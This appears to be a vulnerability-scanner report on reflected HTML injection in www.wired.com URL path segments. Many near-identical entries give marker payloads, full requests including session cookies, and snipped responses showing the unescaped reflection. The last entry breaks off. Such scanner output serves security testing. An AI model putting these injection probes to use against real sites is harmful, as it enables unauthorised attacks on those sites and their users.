The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 45d4a"><a>db634723549 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /science45d4a"><a>db634723549/discoveries/news/2007/04/dayintech_0411 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29321 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Sun, 21 Nov 2010 23:20:05 GMT Date: Sun, 21 Nov 2010 23:10:05 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_science45d4a"><a>db634723549 ss_discoveries c_news"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 52754"><a>779fdc29594 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /science/discoveries52754"><a>779fdc29594/news/2007/04/dayintech_0411 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29321 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Sun, 21 Nov 2010 23:20:34 GMT Date: Sun, 21 Nov 2010 23:10:34 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_science ss_discoveries52754"><a>779fdc29594 c_news"> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1c53d"><a>70481f04aba was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /science/discoveries/news1c53d"><a>70481f04aba/2007/04/dayintech_0411 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29321 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Sun, 21 Nov 2010 23:20:45 GMT Date: Sun, 21 Nov 2010 23:10:45 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_science ss_discoveries c_news1c53d"><a>70481f04aba"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e2f61"><a>cb8010c293b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /sciencee2f61"><a>cb8010c293b/discoveries/news/2007/04/dayintech_0426 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29321 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Sun, 21 Nov 2010 23:19:51 GMT Date: Sun, 21 Nov 2010 23:09:51 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_sciencee2f61"><a>cb8010c293b ss_discoveries c_news"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 76756"><a>179b35b8b9f was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /science/discoveries76756"><a>179b35b8b9f/news/2007/04/dayintech_0426 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29321 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Sun, 21 Nov 2010 23:20:21 GMT Date: Sun, 21 Nov 2010 23:10:21 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_science ss_discoveries76756"><a>179b35b8b9f c_news"> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7e6c7"><a>f3b3a70bcbe was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /science/discoveries/news7e6c7"><a>f3b3a70bcbe/2007/04/dayintech_0426 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29321 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Sun, 21 Nov 2010 23:20:37 GMT Date: Sun, 21 Nov 2010 23:10:37 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_science ss_discoveries c_news7e6c7"><a>f3b3a70bcbe"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 78e8c"><a>82286881d2 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /science78e8c"><a>82286881d2/discoveries/news/2007/04/dayintech_0427 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29319 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Sun, 21 Nov 2010 23:19:40 GMT Date: Sun, 21 Nov 2010 23:09:40 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_science78e8c"><a>82286881d2 ss_discoveries c_news"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 82709"><a>31e9f734c89 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /science/discoveries82709"><a>31e9f734c89/news/2007/04/dayintech_0427 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29321 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Sun, 21 Nov 2010 23:20:08 GMT Date: Sun, 21 Nov 2010 23:10:08 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_science ss_discoveries82709"><a>31e9f734c89 c_news"> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 59461"><a>c9541460a9 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /science/discoveries/news59461"><a>c9541460a9/2007/04/dayintech_0427 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29319 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Sun, 21 Nov 2010 23:20:27 GMT Date: Sun, 21 Nov 2010 23:10:27 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_science ss_discoveries c_news59461"><a>c9541460a9"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e2efb"><a>fefb1eda5ce was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /sciencee2efb"><a>fefb1eda5ce/discoveries/news/2007/05/dayintech_0503 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29321 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Sun, 21 Nov 2010 23:20:15 GMT Date: Sun, 21 Nov 2010 23:10:15 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_sciencee2efb"><a>fefb1eda5ce ss_discoveries c_news"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 60a82"><a>54e3f66b7a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /science/discoveries60a82"><a>54e3f66b7a/news/2007/05/dayintech_0503 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29319 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Sun, 21 Nov 2010 23:20:39 GMT Date: Sun, 21 Nov 2010 23:10:39 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_science ss_discoveries60a82"><a>54e3f66b7a c_news"> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 91895"><a>1c7fed98e1a was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /science/discoveries/news91895"><a>1c7fed98e1a/2007/05/dayintech_0503 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29321 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Sun, 21 Nov 2010 23:20:54 GMT Date: Sun, 21 Nov 2010 23:10:54 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_science ss_discoveries c_news91895"><a>1c7fed98e1a"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 95176"><a>ea0344b1c10 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /science95176"><a>ea0344b1c10/discoveries/news/2007/05/dayintech_0515 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29321 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Sun, 21 Nov 2010 23:20:45 GMT Date: Sun, 21 Nov 2010 23:10:45 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_science95176"><a>ea0344b1c10 ss_discoveries c_news"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d23ae"><a>0f5c0610fda was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /science/discoveriesd23ae"><a>0f5c0610fda/news/2007/05/dayintech_0515 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29321 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Sun, 21 Nov 2010 23:21:06 GMT Date: Sun, 21 Nov 2010 23:11:06 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_science ss_discoveriesd23ae"><a>0f5c0610fda c_news"> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 30df0"><a>9cafe32651a was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /science/discoveries/news30df0"><a>9cafe32651a/2007/05/dayintech_0515 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29321 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Sun, 21 Nov 2010 23:21:20 GMT Date: Sun, 21 Nov 2010 23:11:20 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_science ss_discoveries c_news30df0"><a>9cafe32651a"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ca5ec"><a>c25249c30fc was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /scienceca5ec"><a>c25249c30fc/discoveries/news/2007/05/dayintech_0524 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29321 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Sun, 21 Nov 2010 23:20:22 GMT Date: Sun, 21 Nov 2010 23:10:22 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_scienceca5ec"><a>c25249c30fc ss_discoveries c_news"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e0442"><a>9e37c4acab2 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /science/discoveriese0442"><a>9e37c4acab2/news/2007/05/dayintech_0524 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29321 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Sun, 21 Nov 2010 23:20:43 GMT Date: Sun, 21 Nov 2010 23:10:43 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_science ss_discoveriese0442"><a>9e37c4acab2 c_news"> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d13aa"><a>0ad5cf6d60a was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /science/discoveries/newsd13aa"><a>0ad5cf6d60a/2007/05/dayintech_0524 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
